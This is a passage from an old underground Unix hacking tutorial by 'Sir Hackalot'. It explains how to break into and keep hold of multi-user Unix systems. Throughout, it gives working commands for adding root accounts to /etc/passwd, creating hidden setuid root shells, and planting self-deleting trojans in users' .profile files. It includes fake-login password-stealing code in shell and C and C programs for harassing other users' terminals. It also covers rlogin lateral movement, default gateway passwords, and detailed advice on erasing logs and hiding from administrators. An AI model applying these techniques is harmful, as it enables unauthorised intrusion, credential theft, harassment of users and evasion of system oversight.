/etc/passwd - This is probably the most important file on a Unix. Why?
               well, basically, it holds the valid usernames/passwords.
               This is important since only those listed in the passwd
               file can login, and even then some can't (will explain).
               The format for the passwordfile is this:

username:password:UserID:GroupID:description(or real name):homedir:shell

                Here are two sample entries:

sirhack:89fGc%^7&a,Ty:100:100:Sir Hackalot:/usr/sirhack:/bin/sh
demo::101:100:Test Account:/usr/demo:/usr/sh

                In the first line, sirhack is a valid user. The second
                field, however, is supposed to be a password, right? Well,
                it is, but it's encrypted with the DES encryption standard.
                the part that says "&a,Ty" may include a date after the comma
                (Ty) that tells unix when the password expires. Yes, the
                date is encrypted into two alphanumeric characters (Ty).

                In the Second example, the demo account has no password.
                so at Login, you could type in:

login: demo
UNIX system V
(c)1984 AT&T
..
..

                But with sirhack, you'd have to enter a password. Now,
                the password file is great, since a lot of times, you;ll
                be able to browse through it to look for unpassworded
                accounts. Remember that some accounts can be restricted
                from logging in, as such:

bin:*:2:2:binaccount:/bin:/bin/sh

                The '*' means you won't be able to login with it. Your
                only hope would be to run an SUID shell (explained later).

        A note about the DES encryption: each unix makes its own unique
"keyword" to base encryption off of. Most of the time its just random letters
and numbers. Its chosen at installation time by the operating system.
        Now, decrypting DES encrypted things ain't easy. Its pretty much
impossible. Especially decrypting the password file (decrypting the password
field within the password file to be exact). Always beware a hacker who
says he decrypted a password file. He's full of shit. Passwords are
never decrypted on unix, but rather, a system call is made to a function
called "crypt" from within the C language, and the string you enter as
the password gets encrypted, and compared to the encrypted password. If
they match, you're in. Now, there are password hackers, but they donot
decrypt the password file, but rather, encrypt words from a dictionary
and try them against every account (by crypting/comparing) until it finds
a match (later on!). Remember, few, if none, have decrypted the password
file successfuly.

/etc/group - This file contains The valid groups. The group file is usually
             defined as this:
             groupname:password:groupid:users in group

         Once again, passwords are encrypted here too. If you see a blank
         in the password entry you can become part of that group by
         using the utility "newgrp". Now, there are some cases in
         which even groups with no password will allow only certain
         users to be assigned to the group via the newgrp command. Usually,
         if the last field is left blank, that means any user can use newgrp
         to get that group's access. Otherwise, only the users specified in
         the last field can enter the group via newgrp.

        Newgrp is just a program that will change your group current
        group id you are logged on under to the one you specify. The
        syntax for it is: newgrp groupname
        Now, if you find a group un passworded, and use newgrp to
        enter it, and it asks for a password, you are not allowed to use
        the group. I will explain this further in The "SU & Newgrp" section.

/etc/hosts - this file contains a list of hosts it is connected to thru
             a hardware network (like an x.25 link or something), or sometimes
             just thru UUCP. This is a good file when you are hacking a
             large network, since it tells you systems you can use with
             rsh (Remote Shell, not restricted shell), rlogin, and telnet,
             as well as other ethernet/x.25 link programs.

/usr/adm/sulog (or su_log) - the file sulog (or su_log) may be found in
             Several directories, but it is usually in /usr/adm. This file
             is what it sounds like. Its a log file, for the program SU.
             What it is for is to keep a record of who uses SU and when.
             whenever you use SU, your best bet would be to edit this file
             if possible, and I'll tell you how and why in the section
             about using "su".

/usr/adm/loginlog
or /usr/adm/acct/loginlog -
        This is a log file, keeping track of the logins.
        Its purpose is merely for accounting and "security review". Really,
        sometimes this file is never found, since a lot of systems keep the
        logging off.

/usr/adm/errlog
or errlog -     This is the error log. It could be located anywhere. It
                keeps track of all serious and even not so serious errors.
                Usually, it will contain an error code, then a situation.
                the error code can be from 1-10, the higher the number, the
                worse the error. Error code 6 is usually used when you try
                to hack. "login" logs your attempt in errlog with error code
                6. Error code 10 means, in a nutshell, "SYSTEM CRASH".

/usr/adm/culog - This file contains entries that tell when you used cu,
                 where you called and so forth. Another security thing.

/usr/mail/<userLogin> - this is where the program "mail" stores its mail.
                        to read a particular mailbox, so they are called,
                        you must be that user, in the user group "mail" or
                        root. each mailbox is just a name. for instance,
                        if my login was "sirhack" my mail file would usually
                        be: /usr/mail/sirhack

/usr/lib/cron/crontabs - This contains the instructions for cron, usually.
                         Will get into this later.

/etc/shadow - A "shadowed" password file. Will talk about this later.

-- The BIN account --

       Well, right now, I'd like to take a moment to talk about the account
"bin". While it is only a user level account, it is very powerful. It is
the owner of most of the files, and on most systems, it owns /etc/passwd,
THE most important file on a unix. See, the bin account owns most of the
"bin" (binary) files, as well as others used by the binary files, such
as login. Now, knowing what you know about file permissions, if bin owns
the passwd file, you can edit passwd and add a root entry for yourself.
You could do this via the edit command:
$ ed passwd
10999 [The size of passwd varies]
* a
sirhak::0:0:Mr. Hackalot:/:/bin/sh
{control-d}
* w
* q
$

Then, you could say: exec login, then you could login as sirhack, and
you'd be root.

/\/\/\/\/\/\/\/\/
Hacking..........
/\/\/\/\/\/\/\/\/

--------------
Account Adding
--------------

        There are other programs that will add users to the system, instead
of ed. But most of these programs will NOT allow a root level user to be
added, or anything less than a UID of 100. One of these programs is
named "adduser". Now, the reason I have stuck this little section in, is
for those who want to use a unix for something useful. Say you want a
"mailing address". If the unix has uucp on it, or is a big college,
chances are, it will do mail transfers. You'll have to test the unix
by trying to send mail to a friend somewhere, or just mailing yourself.
If the mailer is identified as "smail" when you mail yourself (the program
name will be imbedded in the message) that probably means that the system
will send out UUCP mail. This is a good way to keep in contact with people.
Now, this is why you'd want a semi-permanent account. The way to achieve this
is by adding an account similar to those already on the system. If all the
user-level accounts (UID >= 100) are three letter abbriviations, say
"btc" for Bill The Cat, or "brs" for bill ryan smith, add an account
via adduser, and make a name like sally jane marshall or something
(they don't expect hackers to put in female names) and have the account
named sjm. See, in the account description (like Mr. Hackalot above), that
is where the real name is usually stored. So, sjm might look like this:
     sjm::101:50:Sally Jane Marshall:/usr/sjm:/bin/sh
Of course, you will password protect this account, right?
Also, group id's don't have to be above 100, but you must put the account
into one that exists. Now, once you login with this account, the first
thing you'd want to do is execute "passwd" to set a password up. If you
don't, chances are someone else 'll do it for you (Then you'll be SOL).

-------------------
Set The User ID
-------------------

        This is porbably one of the most used schemes. Setting up an "UID-
Shell". What does this mean? Well, it basically means you are going
to set the user-bit on a program. The program most commonly used is
a shell (csh,sh, ksh, etc). Why? Think about it: You'll have access
to whatever the owner of the file does. A UID shell sets the user-ID of
the person who executes it to the owner of the program. So if root
owns a uid shell, then you become root when you run it. This is an
alternate way to become root.

        Say you get in and modify the passwd file and make a root level
account unpassworded, so you can drop in. Of course, you almost HAVE to
get rid of that account or else it WILL be noticed eventually. So, what
you would do is set up a regular user account for yourself, then, make
a uid shell. Usually you would use /bin/sh to do it. After adding
the regular user to the passwd file, and setting up his home directory,
you could do something like this:
(assume you set up the account: shk)
# cp /bin/sh /usr/shk/runme
# chmod a+s /usr/shk/runme

Thats all there would be to it. When you logged in as shk, you could just
type in:

$ runme
#

See? You'd then be root. Here is a thing to do:

$ id
uid=104(shk) gid=50(user)

$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#

The euid is the "effective" user ID. UID-shells only set the effective
userid, not the real user-id. But, the effective user id over-rides the
real user id. Now, you can, if you wanted to just be annoying, make
the utilities suid to root. What do I mean? For instance, make 'ls'
a root 'shell'. :

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
..
......
etc crap

Ls would then be able to pry into ANY directory. If you did the same to
"cat" you could view any file. If you did it to rm, you could delete any
file. If you did it to 'ed', you could edit any-file (nifty!), anywhere on
the system (usually).

How do I get root?
------------------

   Good question indeed. To make a program set the user-id shell to root,
you have to be root, unless you're lucky. What do I mean? Well, say
you find a program that sets the user-id to root. If you have access
to write to that file, guess what? you can copy over it, but keep
the uid bit set. So, say you see that the program chsh is setting
the user id too root. You can copy /bin/sh over it.

$ ls -l
rwsrwsrws root     other 10999 Jan 4 chsh
$ cp /bin/sh chsh
$ chsh
#

See? That is just one way. There are others, which I will now talk
about.

More on setting the UID
-----------------------

        Now, the generic form for making a program set the User-ID bit
is to use this command:

chmod a+s file

Where 'file' is a valid existing file. Now, only those who own the file
can set the user ID bit. Remember, anything YOU create, YOU own, so if
you copy th /bin/sh, the one you are logged in as owns it, or IF the
UID is set to something else, the New UID owns the file. This brings
me to BAD file permissions.

II. HACKING : Bad Directory Permissions

        Now, what do I mean for bad directory permissions? Well, look for
files that YOU can write to, and above all, DIRECTORIES you can write to.
If you have write permissions on a file, you can modify it. Now, this comes
in handy when wanting to steal someone's access. If you can write to
a user's .profile, you are in business. You can have that user's .profile
create a suid shell for you to run when You next logon after the user.
If the .profile is writable to you, you can do this:

$ ed .profile
[some number will be here]
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
(control-d)
? w
[new filesize will be shown]
? q
$

Now, when the user next logs on, the .profile will create .runme which
will set your ID to the user whose .profile you changed. Ideally, you'll
go back in and zap those lines after the suid is created, and you'll create
a suid somewhere else, and delete the one in his dir. The .runme will
not appear in the user's REGULAR directory list, it will only show up
if he does "ls -a" (or ls with a -a combination), because, the '.' makes
a file hidden.

The above was a TROJAN HORSE, which is one of the most widely used/abused
method of gaining more power on a unix. The above could be done in C via
the system() command, or by just plain using open(), chmod(), and the like.
* Remember to check and see if the root user's profile is writeable *
* it is located at /.profile (usually) *

   The BEST thing that could happen is to find a user's directory writeable
   by you. Why? well, you could replace all the files in the directory
   with your own devious scripts, or C trojans. Even if a file is not
   writeable by you, you can still overwrite it by deleteing it. If you
   can read various files, such as the user's .profile, you can make a
   self deleting trojan as so:

$ cp .profile temp.pro
$ ed .profile
1234
? a
cp /bin/sh .runme
chmod a+x .runme
chmod a+s .runme
mv temp.pro .profile
(control-d)
? w
[another number]
? q
$ chown that_user temp.pro

What happens is that you make a copy of the .profile before you change it.
Then, you change the original. When he runs it, the steps are made, then
the original version is placed over the current, so if the idiot looks in
his .profile, he won't see anything out of the ordinary, except that he
could notice in a long listing that the change date is very recent, but
most users are not paranoid enough to do extensive checks on their files,
except sysadm files (such as passwd).

Now, remember, even though you can write to a dir, you may not be able
to write to a file without deleting it. If you do not have write perms
for that file, you'll have to delete it and write something in its place
(put a file with the same name there). The most important thing to remember
if you have to delete a .profile is to CHANGE the OWNER back after you
construct a new one (hehe) for that user. He could easily notice that his
.profile was changed and he'll know who did it. YES, you can change the
owner to someone else besides yourself and the original owner (as to throw
him off), but this is not wise as keeping access usually relies on the fact
that they don't know you are around.

You can easily change cron files if you can write to them. I'm not going
to go into detail about cronfile formats here, just find the crontab files
and modify them to create a shell somewhere as root every once in a while,
and set the user-id.

III. Trojan Horses on Detached terminals.
        Basically this: You can send garbage to a user's screen and
        mess him up bad enough to force a logoff, creating a detached
        account. Then you can execute a trojan horse off that terminal in
        place of login or something, so the next one who calls can hit the
        trojan horse. This USUALLY takes the form of a fake login and
        write the username/pw entererred to disk.

        Now, there are other trojan horses available for you to write. Now,
        don't go thinking about a virus, for they don't work unless ROOT runs
        them. Anyway, a common trjan would be a shell script to get the
        password, and mail it to you. Now, you can replace the code for
        the self deleting trojan with one saying something like:
        echo "login: \c"
        read lgin
        echo off (works on some systems)
        (if above not available...: stty -noecho)
        echo "Password:\c"
        read pw
        echo on
        echo "Login: $lgin - Pword: $pw" | mail you

        Now, the best way to use this is to put it in a seperate script file
        so it can be deleted as part of the self deleting trojan. A quick
        modification, removing the "login: " and leaving the password
        may have it look like SU, so you can get the root password. But
        make sure the program deletes itself. Here is a sample trojan
        login in C:

        #include <stdio.h>
        /* Get the necessary defs.. */
        main()
        {
          char *name[80];
          char *pw[20];
          FILE *strm;
          printf("login: ");
          gets(name);
          pw = getpass("Password:");
          strm = fopen("/WhereEver/Whateverfile","a");
          fprintf(strm,"User: (%s), PW [%s]\n",name,pw);
          fclose(strm);
          /* put some kind of error below... or something... */
          printf("Bus Error - Core Dumped\n");
          exit(1);
          }

        The program gets the login, and the password, and appends it to
        a file (/wherever/whateverfile), and creates the file if it can,
        and if its not there. That is just an example. Network Annoyances
        come later.

IV. Odd systems

        There may be systems you can log in to with no problem, and find some
slack menu, database, or word processor as your shell, with no way to the
command interpreter (sh, ksh, etc..). Don't give up here. Some systems will
let you login as root, but give you a menu which will allow you to add an
account. However, ones that do this usually have some purchased software
package running, and the people who made the software KNOW that the people
who bought it are idiots, and the thing will sometimes only allow you to
add accounts with user-id 100 or greater, with their special menushell as
a shell. You probably won't get to pick the shell, the program will probably
stick one on the user you created which is very limiting. HOWEVER, sometimes
you can edit accounts, and it will list accounts you can edit on the screen.
HOWEVER, these programs usually only list those with UIDS > 100 so you don't
edit the good accounts, however, they donot stop you from editing an account
with a UID < 100. The "editing" usually only involves changing the password
on the account. If an account has a * for a password, the standard passwd
program which changes programs, will say no pw exists, and will ask you to
enter one. (wallah! You have just freed an account for yourself. Usually
bin and sys have a * for a password). If one exists you'll have to enter
the old Password (I hope you know it!) for that account. Then, you are
in the same boat as before. (BTW -- These wierd systems are usually
Xenix/386, Xenix/286, or Altos/286)
        With word processors, usually you can select the load command,
and when the word processor prompts for a file, you can select the passwd
file, to look for open accounts, or at least valid ones to hack. An example
would be the informix system. You can get a word processor with that such
as Samna word, or something, and those Lamers will not protect against
shit like that. Why? The Passwd file HAS to be readable by all for the most
part, so each program can "stat" you. However, word processors could be made
to restrict editing to a directory, or set of directories. Here is an
example:

        $ id
        uid=100(sirhack) gid=100(users)
        $ sword
        (word processor comes up)
        (select LOAD A FILE)
        <Edit File>: /etc/passwd
        <Loading..>
        (you see: )
        root:dkdjkgsf!!!:0:0:Sysop:/:/bin/sh
        sirhack:dld!k%%^%:100:100:Sir Hackalot:/usr/usr1/sirhack:/bin/sh
        datawiz::101:100:The Data Wizard:/usr/usr1/datawiz:/bin/sh
        ...

Now I have found an account to take over! "datawiz" will get me in with no
trouble, then I can change his password, which he will not like at all.
Some systems leave "sysadm" unpassworded (stupid!), and now, Most versions
of Unix, be it Xenix, Unix, BSD, or whatnot, they ship a sysadm shell which
will menu drive all the important shit, even creating users, but you must
have ansi or something.

        You can usually tell when you'll get a menu. Sometimes on UNIX
        SYSTEM V, when it says TERM = (termtype), and is waiting for
        you to press return or whatever, you will probably get a menu.. ack.

V. Shadowed Password files
        Not much to say about this. all it is, is when every password field
        in the password file has an "x" or just a single character. What
        that does is screw you, becuase you cannot read the shadowed password
        file, only root can, and it contains all the passwords, so you will
        not know what accounts have no passwords, etc.

There are a lot of other schemes for hacking unix, lots of others, from
writing assembly code that modifies the PCB through self-changing code which
the interrupt handler doesn't catch, and things like that. However, I do
not want to give away everything, and this was not meant for advanced Unix
Hackers, or atleast not the ones that are familiar with 68xxx, 80386 Unix
assembly language or anything. Now I will Talk about Internet.

--->>> InterNet <<<---
        Why do I want to talk about InterNet? Well, because it is a prime
example of a TCP/IP network, better known as a WAN (Wide-Area-Network).
Now, mainly you will find BSD systems off of the Internet, or SunOS, for
they are the most common. They may not be when System V, Rel 4.0, Version
2.0 comes out. Anyway, these BSDs/SunOSs like to make it easy to jump
from one computer to another once you are logged in. What happens is
EACH system has a "yello page password file". Better known as yppasswd.
If you look in there, and see blank passwords you can use rsh, rlogin, etc..
to slip into that system. One system in particular I came across had a
a yppasswd file where *300* users had blank passwords in the Yellow Pages.
Once I got in on the "test" account, ALL I had to do was select who I wanted
to be, and do: rlogin -l user (sometimes -n). Then it would log me onto
the system I was already on, through TCP/IP. However, when you do this,
remember that the yppasswd only pertains to the system you are on at
the time. To find accounts, you could find the yppasswd file and do:

% cat yppasswd | grep ::

Or, if you can't find yppasswd..

% ypcat passwd | grep ::

On ONE system (which will remain confidential), I found the DAEMON account
left open in the yppasswd file. Not bad. Anyway, through one system
on the internet, you can reach many. Just use rsh, or rlogin, and look
in the file: /etc/hosts for valid sites which you can reach. If you get
on to a system, and rlogin to somewhere else, and it asks for a password,
that just means one of two things:

A. Your account that you have hacked on the one computer is on the target
   computer as well. Try to use the same password (if any) you found the
   hacked account to have. If it is a default, then it is definitly on the
   other system, but good luck...

B. rlogin/rsh passed your current username along to the remote system, so it
   was like typing in your login at a "login: " prompt. You may not exist on
   the other machine. Try "rlogin -l login_name", or rlogin -n name..
   sometimes, you can execute "rwho" on another machine, and get a valid
   account.

Some notes on Internet servers. There are "GATEWAYS" that you can get into
that will allow access to MANY internet sites. They are mostly run off
a modified GL/1 or GS/1. No big deal. They have help files. However,
you can get a "privilged" access on them, which will give you CONTROL of
the gateway.. You can shut it down, remove systems from the Internet, etc..
When you request to become privileged, it will ask for a password. There is
a default. The default is "system". I have come across *5* gateways with
the default password. Then again, DECNET has the same password, and I have
come across 100+ of those with the default privileged password. CERT Sucks.
a Gateway that led to APPLE.COM had the default password. Anyone could
have removed apple.com from the internet. Be advised that there are many
networks now that use TCP/IP.. Such as BARRNET, LANET, and many other
University networks.

--** Having Fun **--

Now, if nothing else, you should atleast have some fun. No, I do not mean
go trashing hardrives, or unlinking directories to take up inodes, I mean
play with online users. There are many things to do. Re-direct output
to them is the biggie. Here is an example:
$ who
loozer   tty1
sirhack tty2
$ banner You Suck >/dev/tty1
$
That sent the output to loozer. The TTY1 is where I/O is being performed
to his terminal (usually a modem if it is a TTY). You can repetitiously
banner him with a do while statement in shell, causing him to logoff. Or
you can get sly, and just screw with him. Observe this C program:

#include <stdio.h>
#include <fcntl.h>
#include <string.h>

main(argc,argument)
int argc;
char *argument[];
{
    int handle;
    char *pstr,*olm[80];
    char *devstr = "/dev/";
    int acnt = 2;
    FILE *strm;
    pstr = "";
    if (argc == 1) {
                printf("OL (OneLiner) Version 1.00 \n");
                printf("By Sir Hackalot [PHAZE]\n");
        printf("\nSyntax: ol tty message\n");
        printf("Example: ol tty01 You suck\n");
        exit(1);
    }
    printf("OL (OneLiner) Version 1.0\n");
        printf("By Sir Hackalot [PHAZE]\n");
    if (argc == 2) {
        strcpy(olm,"");
        printf("\nDummy! You forgot to Supply a ONE LINE MESSAGE\n");
        printf("Enter one Here => ");
        gets(olm);
    }
    strcpy(pstr,"");
    strcat(pstr,devstr);
        strcat(pstr,argument[1]);
    printf("Sending to: [%s]\n",pstr);
    strm = fopen(pstr,"a");
    if (strm == NULL) {
        printf("Error writing to: %s\n",pstr);
        printf("Cause: No Write Perms?\n");
        exit(2);
    }
    if (argc == 2) {
                if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s): \n",logname());
                fprintf(strm,"%s\n",olm);
        fclose(strm);
        printf("Message Sent.\n");
        exit(0);
    }
        if (argc > 2) {
                if (strcmp(logname(),"sirhack") != 0) fprintf(strm,"Message from (%s):\n",logname());
        while (acnt <= argc - 1) {
            fprintf(strm,"%s ",argument[acnt]);
            acnt++;
        }
        fclose(strm);
        printf("Message sent!\n");
        exit(0);
    }
}

What the above does is send one line of text to a device writeable by you
in /dev. If you try it on a user named "sirhack" it will notify sirhack
of what you are doing. You can supply an argument at the command line, or
leave a blank message, then it will prompt for one. You MUST supply a
Terminal. Also, if you want to use ?, or *, or (), or [], you must not
supply a message at the command line, wait till it prompts you. Example:

$ ol tty1 You Suck!
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Sending to: [/dev/tty1]
Message Sent!
$
Or..
$ ol tty1
OL (OneLiner) Version 1.00
by Sir Hackalot [PHAZE]
Dummy! You Forgot to Supply a ONE LINE MESSAGE!
Enter one here => Loozer! Logoff (NOW)!! ^G^G
Sending to: [/dev/tty1]
Message Sent!
$

You can even use it to fake messages from root. Here is another:

/*
* Hose another user
*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <signal.h>
#include <utmp.h>
#include <time.h>
#include <termio.h>
#include <sys/utsname.h>

#define NMAX    sizeof(ubuf.ut_name)

struct    utmp ubuf;
struct    termio oldmode, mode;
struct    utsname name;
int yn;
int loop = 0;
char    *realme[50] = "Unknown";
char    *strcat(), *strcpy(), me[50] = "???", *him, *mytty, histty[32];
char    *histtya, *ttyname(), *strrchr(), *getenv();
int    signum[] = {SIGHUP, SIGINT, SIGQUIT, 0}, logcnt, eof(), timout();
FILE    *tf;

main(argc, argv)
int argc;
char *argv[];
{
    register FILE *uf;
    char c1, lastc;
    int goodtty = 0;
    long clock = time((long *) 0);
    struct tm *localtime();
    struct tm *localclock = localtime( &clock );
    struct stat stbuf;
    char psbuf[20], buf[80], window[20], junk[20];
    FILE *pfp, *popen();

    if (argc < 2) {
                printf("usage: hose user [ttyname]\n");
        exit(1);
    }
        him = argv[1];

    if (argc > 2)
        histtya = argv[2];
    if ((uf = fopen("/etc/utmp", "r")) == NULL) {
        printf("cannot open /etc/utmp\n");
        exit(1);
    }
    cuserid(me);
    if (me == NULL) {
        printf("Can't find your login name\n");
        exit(1);
    }
    mytty = ttyname(2);
    if (mytty == NULL) {
        printf("Can't find your tty\n");
        exit(1);
    }
    if (stat(mytty, &stbuf) < 0) {
        printf("Can't stat your tty -- This System is bogus.\n");
    }
    if ((stbuf.st_mode&02) == 0) {
        printf("You have write permissions turned off (hehe!).\n");
    }

    if (histtya) {
        if (!strncmp(histtya, "/dev/", 5))
            histtya = strrchr(histtya, '/') + 1;
        strcpy(histty, "/dev/");
        strcat(histty, histtya);
    }
    while (fread((char *)&ubuf, sizeof(ubuf), 1, uf) == 1) {
        if (ubuf.ut_name[0] == '\0')
            continue;
        if (!strncmp(ubuf.ut_name, him, NMAX)) {
            logcnt++;
            if (histty[0]==0) {
                strcpy(histty, "/dev/");
                strcat(histty, ubuf.ut_line);
            }
            if (histtya) {
                if (!strcmp(ubuf.ut_line, histtya))
                    goodtty++;
            }
        }
    }
    fclose(uf);
        if (logcnt==0) {
        printf("%s not found! (Not logged in?)\n", him);
        exit(1);
    }

    if (histtya==0 && logcnt > 1) {
        printf("%s logged more than once\nwriting to %s\n", him, histty+5);
    }
    if (access(histty, 0) < 0) {
        printf("No such tty? [%s]\n",histty);
        exit(1);
    }
    signal(SIGALRM, timout);
    alarm(5);
    if ((tf = fopen(histty, "w")) == NULL)
        goto perm;
    alarm(0);
    if (fstat(fileno(tf), &stbuf) < 0)
        goto perm;
    if (geteuid() != 0 && (stbuf.st_mode&02) == 0)
        goto perm;
    ioctl(0, TCGETA, &oldmode);        /* save tty state */
    ioctl(0, TCGETA, &mode);
    sigs(eof);
    uname(&name);
        if (strcmp(him,"YOURNAMEHERE") == 0) yn = 1;
if (yn == 1 ) {
    fprintf(tf, "\r(%s attempted to HOSE You with NW)\r\n",me);
    fclose(tf);
    printf("Critical Error Handler: %s running conflicting process\n",him);
    exit(1);
}
    fflush(tf);
    mode.c_cc[4] = 1;
    mode.c_cc[5] = 0;
    mode.c_lflag &= ~ICANON;
    ioctl(0, TCSETAW, &mode);
    lastc = '\n';

printf("Backspace / Spin Cursor set lose on: %s\n",him);
   while (loop == 0) {
   c1 = '\b';
   write(fileno(tf),&c1,1);
   sleep(5);
fprintf(tf,"\\\b|\b/\b-\b+\b");
   fflush(tf);
   }

perm:
printf("Write Permissions denied!\n");
exit(1);
}

timout()
{

printf("Timeout opening their tty\n");
exit(1);
}

eof()
{
printf("Bye..\n");
ioctl(0, TCSETAW, &oldmode);
exit(0);
}

ex()
{
    register i;
    sigs(SIG_IGN);
    i = fork();
    if (i < 0) {
        printf("Try again\n");
        goto out;
    }
    if (i == 0) {
        sigs((int (*)())0);
        execl(getenv("SHELL")?getenv("SHELL"):"/bin/sh","sh","-t",0);
        exit(0);
    }
    while(wait((int *)NULL) != i)
        ;
    printf("!\n");
out:
    sigs(eof);
}

sigs(sig)
int (*sig)();
{
    register i;
    for (i=0; signum[i]; i++)
        signal(signum[i], sig);
}

What the above is, is a modified version of the standard write command.
What it does, is spin the cursor once, then backspace once over the
screen of the user it is run on. All though, it does not physically affect
input, the user thinks it does. therefore, he garbles input. The sleep(xx)
can be changed to make the stuff happen more often, or less often.
If you put your login name in the "YOURNAMEHERE" slot, it will protect you
from getting hit by it, if someone off a Public access unix leeches the
executable from your directory.
You could make a shorter program that does almost the same thing, but
you have to supply the terminal, observe:

/* Backspace virus, by Sir Hackalot [Phaze] */
#include <stdio.h>
#include <fcntl.h>
main(argc,argv)
char *argv[];
int argc;
{
        int x = 1;
        char *device = "/dev/";
        FILE *histty;
        if (argc == 1) {
        printf("Bafoon. Supply a TTY.\n");
        exit(1);
        }
        strcat(device,argv[1]);
        /* Make the filename /dev/tty.. */
        histty = fopen(device,"a");
        if (histty == NULL) {
        printf("Error opening/writing to tty. Check their perms.\n");
        exit(1);
        }
        printf("BSV - Backspace virus, By Sir Hackalot.\n");
        printf("The Sucker on %s is getting it!\n",device);
        while (x == 1) {
        fprintf(histty,"\b\b");
        fflush(histty);
        sleep(5);
        }
        }

Thats all there is to it. If you can write to their tty, you can use this on
them. It sends two backspaces to them every approx. 5 seconds. You
should run this program in the background. (&). Here is an example:

$ who
sirhack     tty11
loozer      tty12
$ bsv tty12&
[1] 4566
BSV - Backspace virus, by Sir Hackalot
The Sucker on /dev/tty12 is getting it!
$

Now, it will keep "attacking" him, until he loggs of, or you kill the process
(which was 4566 -- when you use &, it gives the pid [usually]).

** Note *** Keep in mind that MSDOS, and other OP systems use The CR/LF
method to terminate a line. However, the LF terminates a line in Unix.
you must STRIP CR's on an ascii upload if you want something you upload
to an editor to work right. Else, you'll see a ^M at the end of every
line. I know that sucks, but you just have to compensate for it.

I have a number of other programs that annoy users, but that is enough to
get your imagination going, provided you are a C programmer. You can annoy
users other ways. One thing you can do is screw up the user's mailbox.
The way to do this is to find a binary file (30k or bigger) on the system
which YOU have access to read. then, do this:

$ cat binary_file | mail loozer

or

$ mail loozer < binary file

That usually will spilt into 2 messages or more. The 1st message will
have a from line.. (from you ..), but the second WILL NOT! Since it does
not, the mail reader will keep exiting and giving him an error message until
it gets fixed.. The way to fix it is to go to the mail box that got hit
with this trick (usually only the one who got hit (or root) and do this),
and edit the file, and add a from line.. like
From username..

then it will be ok. You can screw the user by "cat"ing a binary to his tty.
say Loozer is on tty12. You can say..
$ cat binary_file >/dev/tty12
$
It may pause for a while while it outputs it. If you want to resume what
you were doing instantly, do:
$ cat binary_file >/dev/tty12&
[1] 4690
$
And he will probably logoff. You can send the output of anything to his
terminal. Even what YOU do in shell. Like this:
$ sh >/dev/tty12
$
You'll get your prompts, but you won't see the output of any commands, he
will...
$ ls
$ banner Idiot!
$ echo Dumbass!
$
until you type in exit, or hit ctrl-d.

There are many many things you can do. You can fake a "write" to someone
and make them think it was from somewhere on the other side of hell. Be
creative.

When you are looking for things to do, look for holes, or try to get
someone to run a trojan horse that makes a suid shell. If you get
someone to run a trojan that does that, you can run the suid, and log their
ass off by killing their mother PID. (kill -9 whatever). Or, you can
lock them out by adding "kill -1 0" to their .profile. On the subject of
holes, always look for BAD suid bits. On one system thought to be invincible
I was able to read/modify everyone's mail, because I used a mailer that had
both the GroupID set, and the UserID set. When I went to shell from it,
the program instantly changed my Effective ID back to me, so I would not be
able to do anything but my regular stuff. But it was not designed to change
the GROUP ID back. The sysop had blundered there. SO when I did an ID
I found my group to be "Mail". Mailfiles are readble/writeable by the
user "mail", and the group "mail". I then set up a sgid (set group id) shell
to change my group id to "mail" when I ran it, and scanned important mail,
and it got me some good info. So, be on the look out for poor permissions.

Also, after you gain access, you may want to keep it. Some tips on doing so
is:
        1. Don't give it out. If the sysadm sees that joeuser logged in 500
           times in one night....then....
        2. Don't stay on for hours at a time. They can trace you then. Also
           they will know it is irregular to have joeuser on for 4 hours
           after work.
        3. Don't trash the system. Don't erase important files, and don't
           hog inodes, or anything like that. Use the machine for a specific
           purpose (to leech source code, develop programs, an Email site).
           Dont be an asshole, and don't try to erase everything you can.
        4. Don't screw with users constantly. Watch their processes and
           run what they run. It may get you good info (snoop!)
        5. If you add an account, first look at the accounts already in there
           If you see a bunch of accounts that are just 3 letter abbrv.'s,
           then make yours so. If a bunch are "cln, dok, wed" or something,
           don't add one that is "joeuser", add one that is someone's
           full initials.

        6. When you add an account, put a woman's name in for the
           description, if it fits (Meaning, if only companies log on to the
           unix, put a company name there). People do not suspect hackers
           to use women's names. They look for men's names.
        7. Don't cost the Unix machine too much money. Ie.. don't abuse an
           outdial, or if it controls trunks, do not set up a bunch of dial
           outs. If there is a pad, don't use it unless you NEED it.
        8. Don't use x.25 pads. Their usage is heavily logged.
        9. Turn off acct logging (acct off) if you have the access to.
           Turn it on when you are done.
       10. Remove any trojan horses you set up to give you access when you
           get access.
       11. Do NOT change the MOTD file to say "I hacked this system" Just
           thought I'd tell you. Many MANY people do that, and lose access
           within 2 hours, if the unix is worth a spit.
       12. Use good judgement. Cover your tracks. If you use su, clean
           up the sulog.
       13. If you use cu, clean up the cu_log.
       14. If you use the smtp bug (wizard/debug), set up a uid shell.
       15. Hide all suid shells. Here's how:
           goto /usr
           (or any dir)
           do:
           # mkdir ".. "
           # cd ".. "
           # cp /bin/sh ".whatever"
           # chmod a+s ".whatever"
           The "" are NEEDED to get to the directory .. ! It will not show
           up in a listing, and it is hard as hell to get to by sysadms if
           you make 4 or 5 spaces in there ("..    "), because all they will
           see in a directory FULL list will be .. and they won't be able to
           get there unless they use "" and know the spacing. "" is used
           when you want to do literals, or use a wildcard as part of a file
           name.
       16. Don't hog cpu time with password hackers. They really don't work
           well.

       17. Don't use too much disk space. If you archieve something to dl,
           dl it, then kill the archieve.
       18. Basically -- COVER YOUR TRACKS.

Some final notes:

Now, I hear lots of rumors and stories like "It is getting harder to get
into systems...". Wrong. (Yo Pheds! You reading this??). It IS true
when you are dealing with WAN's, such as telenet, tyment, and the Internet,
but not with local computers not on those networks. Here's the story:

Over the past few years, many small companies have sprung up as VARs
(Value Added Resellers) for Unix and Hardware, in order to make a fast
buck. Now, these companies fast talk companies into buying whatever,
and they proceed in setting up the Unix. Now, since they get paid by
the hour usaually when setting one up, they spread it out over days....
during these days, the system is WIDE open (if it has a dialin). Get
in and add yourself to passwd before the seal it off (if they do..).
Then again, after the machine is set up, they leave the defaults on the
system. Why? The company needs to get in, and most VARs cannot use
unix worth a shit, all they know how to do is set it up, and that is ALL.
Then, they turn over the system to a company or business that USUALLY
has no-one that knows what they hell they are doing with the thing, except
with menus. So, they leave the system open to all...(inadvertedly..),
because they are not competant. So, you could usually get on, and create
